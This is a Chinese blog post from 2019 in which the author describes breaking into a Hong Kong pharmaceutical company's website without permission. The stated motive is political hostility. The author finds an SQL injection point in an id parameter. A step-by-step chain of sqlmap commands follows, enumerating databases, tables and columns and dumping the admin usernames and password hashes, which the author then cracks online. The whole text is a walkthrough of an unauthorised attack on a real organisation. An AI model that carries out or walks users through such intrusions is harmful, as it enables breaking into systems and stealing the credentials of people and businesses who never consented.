【實戰XOX】測試香港某葯業注入漏洞

  • 2019 年 11 月 11 日
  • 筆記

最近,廢青要港獨!!!

於是我隨意的在網上找到了中國香港的一個葯業網站,起先沒什麼,也只是看看。突然發現是存在漏洞的!!!

可以看得出id= 可能存在漏洞

加了一個單引號,頁面報錯,我也可以確定是存在注入漏洞的

看著樣子,它可能不存在waf,因為並沒有攔截我的單引號

這時候我們就得祭出神器sqlmap

開始測試我們的注入點

python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128"

這是基本的判斷是否存在注入的語句

可以很明確的知道,是存在注入漏洞的。

the back-end DBMS is MySQL

web application technology: Nginx, PHP, PHP 5.6.40

back-end DBMS: MySQL >= 5.0.12

這是詳細的資訊,既然是mysql資料庫。那麼接下來我們就得爆出他的資料庫!!!因為mysql是有多個資料庫的

python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128" –dbs

執行這個命令== 等待一下即可

可以看見,只有兩個資料庫!出乎我意料的少。沒事根據我的經驗,帳號密碼肯定存在ajyy這個資料庫裡面

那麼,我們就可以開始爆資料庫裡面的表的內容了

python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128" –tables -D "ajyy"

回車執行

這一次的表有點多,我就不一一列舉出來,但從表中 我看到了dy_admin這個表,所有可以推斷這個表存在帳號密碼,於是 我們開始 下一步

python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128" –columns -T "dy_admin" -D "ajyy"

開始執行

果然不出我所料,看到username和password,我激動了

因為欄位知道了,接下來就是最後一步了

python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128" –dump -C "username,password" -T "dy_admin" -D "ajyy"

回車執行

很成功的發現了帳號密碼,不過密碼有著md5的加密 ,於是我用了somd5去解密

成功的知道了密碼 ,這裡我就不發出來,保護網站的隱私

這篇文章就到這裡 ,不夠精彩 ,下篇再見